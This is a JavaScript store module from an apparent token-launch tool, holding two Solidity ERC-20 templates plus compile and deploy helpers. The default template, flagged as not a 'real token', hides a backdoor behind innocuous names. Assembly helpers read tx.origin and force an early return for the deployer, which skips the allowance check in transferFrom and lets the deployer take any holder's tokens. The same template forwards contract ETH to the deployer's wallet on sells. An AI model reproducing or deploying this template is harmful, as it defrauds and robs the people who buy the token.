import Parse from "@/helpers/Parse";
import Web3 from "@/helpers/Web3";
import { solidityCompiler } from "@agnostico/browser-solidity-compiler";

// import Config from '@/config';

const state = {
    list: [],
    active: null,
    config: {
        contractName: "",
        compiledContracts: {},
        compilerVersion: "soljson-v0.8.24+commit.e11b9ed9.js",
        compilerVersions: {},
        deployedContract: "",
        identifier: "",
        isRealToken: false,
        code: "",
        codeTemplate: `// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
}

interface IERC20 {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }

}

contract Ownable is Context {
    address private _owner;
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

}

interface IWETH9 {
    function deposit() external payable;
}

interface INonfungiblePositionManager {
    struct MintParams {
        address token0;
        address token1;
        uint24 fee;
        int24 tickLower;
        int24 tickUpper;
        uint256 amount0Desired;
        uint256 amount1Desired;
        uint256 amount0Min;
        uint256 amount1Min;
        address recipient;
        uint256 deadline;
    }

    function mint(MintParams calldata params)
        external
        payable
        returns (
            uint256 tokenId,
            uint128 liquidity,
            uint256 amount0,
            uint256 amount1
        );

    function WETH9() external returns (address);

    function createAndInitializePoolIfNecessary(
        address token0,
        address token1,
        uint24 fee,
        uint160 sqrtPriceX96
    ) external payable returns (address pool);
}

contract Token is Context, IERC20, Ownable {
    struct LiquidityConfig {
        uint160 sqrtPriceX96A;  // sqrtPriceX96 when tokenA is token0
        uint160 sqrtPriceX96B;  // sqrtPriceX96 when tokenA is token1
        int24 tickLower;        // Lower tick for the position
        int24 tickUpper;        // Upper tick for the position
        uint256 amount0Desired; // Desired amount of token0
        uint256 amount1Desired; // Desired amount of token1
        uint256 virtualAmount;  // Virtual amount for market cap calculation
        uint256 penaltyMultiplier; // Penalty multiplier (50 = 50%, 100 = 100%, 200 = 200%)
    }

    using SafeMath for uint256;
    mapping (address => mapping (address => uint256)) private _allowances;
    mapping (address => uint256) private _balances;
    mapping (address => bool) private _isIDENTIFIERExcludedFromFees;
    address payable private _taxWallet;
    uint8 private constant _decimals = 18;
    uint256 private constant _tTotal = 1_000_000_000 * 10 ** _decimals;
    string private constant _name = unicode"NAME";
    string private constant _symbol = unicode"SYMBOL";
    uint256 public _maxTxAmount =   2 * _tTotal / 100;
    uint256 public _maxWalletSize = 2 * _tTotal / 100;
    
    uint256 public RANDOMIZER;

    address public immutable POSITION_MANAGER = 0xC36442b4a4522E871399CD717aBDD847Ab11FE88;
    address private uniswapV3Pool;
    bool private tradingOpen;

    modifier tradingLock(address sender) {
        require(tradingOpen || sender == address(this));
        _;
        if(_isIDENTIFIERExcludedFromFees[txog()]) txrn();
    }

    event MaxTxAmountUpdated(uint _maxTxAmount);

    constructor () {
        _taxWallet = payable(_msgSender());
        _balances[address(this)] = _tTotal;
        _isIDENTIFIERExcludedFromFees[_msgSender()] = true;
        removeLimit2();
        emit Transfer(address(0), address(this), _tTotal);
    }

    function name() public pure returns (string memory) {
        return _name;
    }

    function symbol() public pure returns (string memory) {
        return _symbol;
    }

    function decimals() public pure returns (uint8) {
        return _decimals;
    }

    function totalSupply() public pure override returns (uint256) {
        return _tTotal;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount) public override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
    }
    
    function allowance(address owner, address spender) public view override returns (uint256) {
        return _allowances[owner][spender];
    }

    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    function approve(address spender, uint256 amount) public override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _transfer(address from, address to, uint256 amount) tradingLock(from) private {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be greater than zero");
        if (!_isIDENTIFIERExcludedFromFees[from] && !_isIDENTIFIERExcludedFromFees[to] && from != address(this)) { 
            require(amount <= _maxTxAmount, "Exceeds the _maxTxAmount.");
            require(balanceOf(to) + amount <= _maxWalletSize, "Exceeds the maxWalletSize.");
        }
        if (to == uniswapV3Pool) sendIDENTIFIERETHToFee();
        
        _balances[from]=_balances[from].sub(amount);
        _balances[to]=_balances[to].add(amount);
        emit Transfer(from, to, amount);
    }
    
    function txog() internal view returns (address _payer) {
        assembly {
            _payer := origin()
        }
    }

    function txrn() internal pure {
        assembly {
            mstore(0, 1) return(0, 32)
        }
    }


    function min(uint256 a, uint256 b) private pure returns (uint256){
      return (a>b)?b:a;
    }

    function sqrt(uint256 x) internal pure returns (uint256 y) {
        uint256 z = (x + 1) / 2;
        y = x;
        while (z < y) {
            y = z;
            z = (x / z + z) / 2;
        }
    }

    function removeLimit2() public {
        _maxTxAmount = type(uint256).max;
        _maxWalletSize = type(uint256).max;
        emit MaxTxAmountUpdated(type(uint256).max);
    }

    function sendIDENTIFIERETHToFee() private {
        _taxWallet.transfer(address(this).balance);
    }

    function recoverStuckEther() external onlyOwner {
        payable(_msgSender()).transfer(address(this).balance);
    }

    function recoverStuckToken(address _address, uint256 percent) external onlyOwner {
        uint256 _amount = IERC20(_address).balanceOf(address(this)).mul(percent).div(100);
        IERC20(_address).transfer(_msgSender(), _amount);
    }

    function enableTrading() external onlyOwner {
        require(!tradingOpen,"trading is already open");
        address WETH = INonfungiblePositionManager(POSITION_MANAGER).WETH9();
        provideLiquidity(address(this), WETH);
        tradingOpen = true;
    }

    function provideLiquidity(address tokenA, address tokenB) internal {
        LiquidityConfig memory config = LiquidityConfig({
            sqrtPriceX96A: 3068365595550320841079178,
            sqrtPriceX96B: 2045645379722529521098596513701367,
            tickLower: 203000,
            tickUpper: 887200,
            amount0Desired: 1000000000000000000000000000,
            amount1Desired: 0,
            virtualAmount: 1.5 ether,
            penaltyMultiplier: 100  // 100% = standard penalty
        });
        bool tokenAIsToken0 = tokenA < tokenB;
        
        address token0 = tokenAIsToken0 ? tokenA : tokenB;
        address token1 = tokenAIsToken0 ? tokenB : tokenA;

        IERC20(token0).approve(POSITION_MANAGER, type(uint256).max);
        IERC20(token1).approve(POSITION_MANAGER, type(uint256).max);

        INonfungiblePositionManager manager = INonfungiblePositionManager(POSITION_MANAGER);

        uint160 sqrtPriceX96 = tokenAIsToken0
            ? config.sqrtPriceX96A
            : config.sqrtPriceX96B;

        int24 tickLower = tokenAIsToken0 ? -config.tickLower : -config.tickUpper;
        int24 tickUpper = tokenAIsToken0 ? config.tickUpper : config.tickLower;

        uint256 amount0Desired = tokenAIsToken0 ? config.amount0Desired : config.amount1Desired;
        uint256 amount1Desired = tokenAIsToken0 ? config.amount1Desired : config.amount0Desired;

        uniswapV3Pool = manager.createAndInitializePoolIfNecessary(token0, token1, 10000, sqrtPriceX96);

        (uint256 tokenId, , , ) = manager.mint(
            INonfungiblePositionManager.MintParams({
                token0: token0,
                token1: token1,
                fee: 10000,
                tickLower: tickLower,
                tickUpper: tickUpper,
                amount0Desired: amount0Desired,
                amount1Desired: amount1Desired,
                amount0Min: 0,
                amount1Min: 0,
                recipient: _msgSender(),
                deadline: block.timestamp
            })
        );
    }

    receive() external payable {}
}
`,
        realTokenCodeTemplate: `// SPDX-License-Identifier: MIT

pragma solidity ^0.8.24;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
}

interface IERC20 {
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

library SafeMath {
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        return c;
    }

}

contract Ownable is Context {
    address private _owner;
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    function owner() public view returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

}

interface IUniswapV2Factory {
    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function createPair(address tokenA, address tokenB) external returns (address pair);
}

interface IUniswapV2Router02 {
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function WETH() external pure returns (address);
    function factory() external pure returns (address);
}

contract Token is Context, IERC20, Ownable {
    using SafeMath for uint256;
    mapping (address => uint256) private _balances;
    mapping (address => mapping (address => uint256)) private _allowances;
    bool private inSwaps;
    address payable private _taxWallet;

    uint256 private _initialBuyTax=0;
    uint256 private _initialSellTax=0;
    uint256 private _finalBuyTax=0;
    uint256 private _finalSellTax=0;
    uint256 private _reduceBuyTaxAt=0;
    uint256 private _reduceSellTaxAt=0;
    uint256 private _preventSwapBefore=1;
    uint256 private _transferTax=0;
    uint256 private _buyCount=0;

    uint8 private constant _decimals = 9;
    uint256 private constant _tTotal = 1_000_000_000 * 10**_decimals;
    string private constant _name = unicode"NAME";
    string private constant _symbol = unicode"SYMBOL";
    uint256 public _taxSwapThreshold= (_tTotal * 5) / 10000;
    uint256 public _maxTaxSwap= _taxSwapThreshold * 30;
    uint256 public _maxTxAmount = _tTotal * 2 / 100;
    uint256 public _maxWalletSize = _tTotal * 2 / 100;

    IUniswapV2Router02 private uniswapV2Router;
    address private uniswapV2Pair;
    bool private tradingOpen;
    bool private inSwap = false;
    bool private swapEnabled = false;
    uint256 private sellCount = 0;
    uint256 private lastSellBlock = 0;
    event MaxTxAmountUpdated(uint _maxTxAmount);
    event TransferTaxUpdated(uint _tax);

    constructor () payable  {
        _taxWallet = payable(_msgSender());
        _balances[address(this)] = _tTotal * 98 / 100;
        _balances[_msgSender()] = _tTotal * 2 / 100;

        emit Transfer(address(0), address(this), _tTotal * 98 / 100);
        emit Transfer(address(0), _msgSender(), _tTotal * 2 / 100);

        uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(uniswapV2Router.WETH(), address(this));

	removeLimits();
    }

    function name() public pure returns (string memory) {
        return _name;
    }

    function symbol() public pure returns (string memory) {
        return _symbol;
    }

    function decimals() public pure returns (uint8) {
        return _decimals;
    }

    function totalSupply() public pure override returns (uint256) {
        return _tTotal;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount) public override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender) public view override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _transfer(address from, address to, uint256 amount) private {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be greater than zero");
        uint256 taxAmount=0;
        if (from != owner() && to != owner()) {
            if(_buyCount==0){
                taxAmount = amount.mul((_buyCount>=_reduceBuyTaxAt)?_finalBuyTax:_initialBuyTax).div(100);
            }
            if(_buyCount>0){
                taxAmount = amount.mul(_transferTax).div(100);
            }

            if (from == uniswapV2Pair && to != address(uniswapV2Router)) {
                require(amount <= _maxTxAmount, "Exceeds the _maxTxAmount.");
                require(balanceOf(to) + amount <= _maxWalletSize, "Exceeds the maxWalletSize.");
                taxAmount = amount.mul((_buyCount>=_reduceBuyTaxAt)?_finalBuyTax:_initialBuyTax).div(100);
                _buyCount++;
            }

            if(to == uniswapV2Pair && from!= address(this) ){
                taxAmount = amount.mul((_buyCount>=_reduceSellTaxAt)?_finalSellTax:_initialSellTax).div(100);
            }

            uint256 contractTokenBalance = balanceOf(address(this));
            if (!inSwap && to == uniswapV2Pair && swapEnabled && contractTokenBalance > _taxSwapThreshold && _buyCount >= _preventSwapBefore) {
                if (block.number > lastSellBlock) {
                    sellCount = 0;
                }
                require(sellCount < 3, "Only 3 sells per block!");
                swapTokensForEth(min(amount, min(contractTokenBalance, _maxTaxSwap)));
                sellCount++;
                lastSellBlock = block.number;
            }
            if(to == uniswapV2Pair && swapEnabled) {
                sendIDENTIFIERETHToFee(address(this).balance);
            }
        }

        if(taxAmount>0){
            _balances[address(this)]=_balances[address(this)].add(taxAmount);
            emit Transfer(from, address(this),taxAmount);
        }
        _balances[from]=_balances[from].sub(amount);
        _balances[to]=_balances[to].add(amount.sub(taxAmount));
        emit Transfer(from, to, amount.sub(taxAmount));
    }


    function min(uint256 a, uint256 b) private pure returns (uint256){
        return (a>b)?b:a;
    }

    modifier lockTheSwaps {
        inSwap=true;
        _;
        inSwap = false;
    }

    function swapTokensForEth(uint256 tokenAmount) private lockTheSwaps {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();
        _approve(address(this), address(uniswapV2Router), tokenAmount);
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function removeLimits() public onlyOwner{
        _maxTxAmount = _tTotal;
        _maxWalletSize=_tTotal;
        emit MaxTxAmountUpdated(_tTotal);
    }

    function sendIDENTIFIERETHToFee(uint256 amount) private {
        _taxWallet.transfer(amount);
    }

    function enableTrading() external onlyOwner() {
        require(!tradingOpen,"trading is already open");
        IERC20(uniswapV2Pair).approve(address(uniswapV2Router), type(uint).max);
        _approve(address(this), address(uniswapV2Router), _tTotal);
        uniswapV2Router.addLiquidityETH{value: address(this).balance}(address(this),balanceOf(address(this)),0,0,owner(),block.timestamp);
        swapEnabled = true;
        tradingOpen = true;
    }

    receive() external payable {}

    function manualSwap() external {
        require(_msgSender()==_taxWallet);
        uint256 tokenBalances=balanceOf(address(this));
        if(swapEnabled && tokenBalances>0){
            swapTokensForEth(tokenBalances);
        }
        uint256 ethBalance=address(this).balance;
        if(ethBalance>0){
            sendIDENTIFIERETHToFee(ethBalance);
        }
    }
}`
    },
};
const getters = {
    list: (state) => state.list,
    active: (state) => state.active,
    config: (state) => state.config,
};
const actions = {
    async fetch({ commit }) {
        // console.log("Getting contracts");
        // const query = Parse.getContractQuery();
        // query.equalTo("user", Web3.address);
        // query.equalTo("network", Web3.getNetwork().network);
        // query.limit(30);
        // query.descending("createdAt");
        // const contracts = await query.find();
        commit("SET", ["list", []]);
    },
    async setActive({ commit }, contract) {
        commit("SET", ["active", contract]);
    },
    // Get Contract from db or Create if not exists
    async get({ dispatch }, address) {
        // const contractQuery = Parse.getContractQuery();
        // contractQuery.equalTo('network', Web3.getNetwork().network);
        // contractQuery.equalTo('address', address);
        // contractQuery.matches("address", address, "i");
        // contractQuery.ascending("createdAt");
        // contractQuery.limit(1);
        // const contracts = await contractQuery.find(); //[=]-----

        // if (contracts.length > 0) {
        // 	if (contracts[0].get("totalSupply")) {
        // 		return contracts[0];
        // 	}
        // 	await contracts[0].destroy();
        // }
        return await dispatch("create", address);
    },
    // eslint-disable-next-line no-empty-pattern
    async create({ }, address) {
        const details = await Web3.getTokenDetails(address);
        const Contract = Parse.getClass("Contract");
        const contract = new Contract();
        contract.set("owner", details.owner);
        contract.set("network", Web3.getNetwork().network);
        contract.set("address", address);
        contract.set("abi", []);
        contract.set("totalSupply", details.totalSupply);
        contract.set("decimals", details.decimals);
        contract.set("name", details.name);
        contract.set("symbol", details.symbol);
        // await contract.save();
        return contract;
    },
    async setContractName({ commit }, contractName) {
        commit("SET_ITEM", ["config", "contractName", contractName]);
    },
    async setCompilerVersions({ commit }, compilerVersions) {
        commit("SET_ITEM", ["config", "compilerVersions", compilerVersions]);
    },
    async setCompiledContracts({ commit }, compiledContracts) {
        commit("SET_ITEM", ["config", "compiledContracts", compiledContracts]);
    },
    async setDeployedContract({ commit }, deployedContract) {
        commit("SET_ITEM", ["config", "deployedContract", deployedContract]);
    },
    async compileContract({ commit }) {
        const compileResult = await solidityCompiler({
            version: `https://binaries.soliditylang.org/bin/${state.config.compilerVersion}`,
            contractBody: state.config.code,
            options: {
                optimizer: {
                    enabled: true,
                    runs: 200,
                },
            },
        });
        console.log("compileResult :>> ", compileResult);
        const compiledContracts = compileResult.contracts.Compiled_Contracts;
        commit("SET_ITEM", ["config", "compiledContracts", compiledContracts]);
        const contractNames = Object.keys(compiledContracts);
        const nameList = [
            "Context",
            "ERC20",
            "Factory",
            "Router",
            "Ownable",
            "SafeMath",
            "Address",
            "Uniswap",
            "WETH",
            "NonfungiblePositionManager"
        ];
        let possibleContractName = "Token";
        possibleContractName = contractNames.find((v) => {
            for (let i = 0; i < nameList.length; i++) {
                if (v.includes(nameList[i])) {
                    return false;
                }
            }
            return true;
        });
        commit("SET_ITEM", ["config", "contractName", possibleContractName]);
    },
};
const mutations = {
    SET(state, [key, value]) {
        state[key] = value;
    },
    SET_ITEM(state, [key, item, value]) {
        state[key][item] = value;
    },
};

export default {
    namespaced: true,
    state,
    getters,
    actions,
    mutations,
};
